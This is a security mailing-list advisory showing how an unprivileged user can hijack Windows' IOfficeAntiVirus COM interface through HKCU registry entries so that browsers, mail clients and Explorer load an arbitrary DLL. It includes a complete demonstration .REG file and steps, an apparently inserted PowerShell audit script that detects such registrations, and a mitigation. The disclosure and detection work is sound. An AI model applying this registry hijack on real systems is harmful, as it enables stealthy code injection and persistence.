List:       full-disclosure
Subject:    [FD] Defense in depth -- the Microsoft way (part 66): attachment manager allows to load arbitrary DL
From:       "Stefan Kanthak" <stefan.kanthak () nexgo ! de>
Date:       2020-03-28 0:07:04
Message-ID: BA138D54B50443EBB6925506D16B6670 () H270

Hi @ll,

This is the continuation of the previous posts
<https://seclists.org/fulldisclosure/2020/Mar/45> and
<https://seclists.org/fulldisclosure/2020/Mar/48>.


(Un)fortunately the IOfficeAntiVirus interface (see
<https://support.microsoft.com/en-us/help/914922/microsoft-windows-defender-helps-provide-real-time-protection>)
has at least one more weakness, which also allows (unprivileged) users to
load arbitrary DLLs into web browsers, mail/news clients, instant
messengers, file explorer and every other program which calls this COM
interface.


With Windows 2000, Microsoft introduced the "merged view" of the
[HKEY_CLASSES_ROOT] virtual registry tree: see
<https://msdn.microsoft.com/en-us/library/ms724498.aspx>

"Thanks" to this feature, COM categories/classes/interfaces registered
by (unprivileged) users below [HKEY_CURRENT_USER\Software\Classes]
obscure the corresponding COM categories/classes/interfaces registered
(by administrators) below [HKEY_LOCAL_MACHINE\SOFTWARE\Classes].
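The shadowing described above is visible from the registry itself: any CLSID registered under the current user's Classes hive with an InProcServer32 key names a DLL that will be loaded into every process which instantiates that class through the merged HKEY_CLASSES_ROOT view. The following PowerShell audit is an added example (not code from the post or from Microsoft); it lists such user-registered in-process servers and flags the two conditions the post relies on, namely that the same CLSID also exists under HKLM (the user key wins) or that the class claims the MSOfficeAntiVirus category id quoted in the post. The function name and parameter names are invented for this example.

```powershell
# Added example (not from the original post): audit HKCU\Software\Classes\CLSID
# for in-process COM servers registered by the current user. Because of the
# merged HKEY_CLASSES_ROOT view, these entries take precedence over the
# administrator-controlled HKLM\SOFTWARE\Classes registrations.
# The category id below is the MSOfficeAntiVirus CATID used in the post's SENTINEL.REG.
$MsOfficeAntiVirusCatId = '{56FFCC30-D398-11D0-B2AE-00A0C908FA49}'

function Get-UserComServerShadowing {
    [CmdletBinding()]
    param(
        # Roots are parameters so the 32-bit view on 64-bit Windows (Wow6432Node)
        # can be audited with the same function.
        [string]$UserClsidRoot    = 'HKCU:\Software\Classes\CLSID',
        [string]$MachineClsidRoot = 'HKLM:\SOFTWARE\Classes\CLSID'
    )

    if (-not (Test-Path $UserClsidRoot)) { return @() }

    Get-ChildItem -Path $UserClsidRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $clsid  = $_.PSChildName
        $inproc = Join-Path $_.PSPath 'InProcServer32'
        # Only in-process servers cause a DLL to be loaded into the calling program.
        if (-not (Test-Path $inproc)) { return }

        $inprocValues   = Get-ItemProperty -Path $inproc -ErrorAction SilentlyContinue
        $categories     = Join-Path $_.PSPath 'Implemented Categories'
        $isOfficeAv     = Test-Path (Join-Path $categories $MsOfficeAntiVirusCatId)
        $shadowsMachine = Test-Path (Join-Path $MachineClsidRoot $clsid)

        [pscustomobject]@{
            CLSID                = $clsid
            InProcServer32       = $inprocValues.'(default)'
            ThreadingModel       = $inprocValues.ThreadingModel
            ShadowsHKLM          = $shadowsMachine   # user key hides an HKLM registration
            MSOfficeAntiVirusCat = $isOfficeAv       # class will be picked up by attachment scanning
        }
    }
}

# Usage: report only the entries that match the post's scenario. An empty
# result on a machine where no user has registered COM classes is the norm;
# a DLL path in a user-writable directory is the indicator worth following up.
Get-UserComServerShadowing |
    Where-Object { $_.ShadowsHKLM -or $_.MSOfficeAntiVirusCat } |
    Format-Table -AutoSize
```

On 64-bit installations the 32-bit registrations live under the redirected `Wow6432Node` subkey, so run the function a second time with `-UserClsidRoot 'HKCU:\Software\Classes\Wow6432Node\CLSID' -MachineClsidRoot 'HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID'` to cover that view as well. Running this audit as a scheduled task, or feeding its output into endpoint telemetry, is a detective complement to the SAFER/AppLocker mitigation named below, since those policies block the DLL from loading but do not remove the registration.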


Demonstration:
~~~~~~~~~~~~~~

On a 32-bit installation of Windows XP SP2 or any newer version of
Windows perform the following steps (adaption for 64-bit installations
is left as an exercise to the reader):

1. Log on to an arbitrary (unprivileged) user account.

2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
   and save it in an arbitrary directory.

3. Create a text file SENTINEL.REG with the following contents:

--- SENTINEL.REG ---
REGEDIT4

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
@="Vulnerability and Exploit Detector"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="MSOfficeAntiVirus"

; replace <path> with the directory used in step 2.
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
@="<path>\\SENTINEL.DLL"
"ThreadingModel"="Both"

; NOTE: the following entries are optional!

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
@="{56FFCC31-D398-11D0-B2AE-00A0C908FA49}"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"

; IUnknown
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface]
@="{00000000-0000-0000-C000-000000000046}"

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods]
@="4"
--- EOF ---

4. Double-click the file SENTINEL.REG to merge it into the user's
   registry.

5. Download an arbitrary file with your web browser, for example
   <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>,
   or save an attachment in your mail client, and notice the
   message boxes displayed from the sentinels.


NOTE: the batch script
      <https://skanthak.homepage.t-online.de/download/MSOAV.CMD>
      performs all these steps on 32-bit and 64-bit installations
      of Windows XP and newer versions of Windows.


Mitigation:
~~~~~~~~~~~

Use AppLocker or SAFER alias Software Restriction Policies: see
<https://skanthak.homepage.t-online.de/SAFER.html>


stay tuned, and NEVER use Windows without SAFER or AppLocker
Stefan Kanthak

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

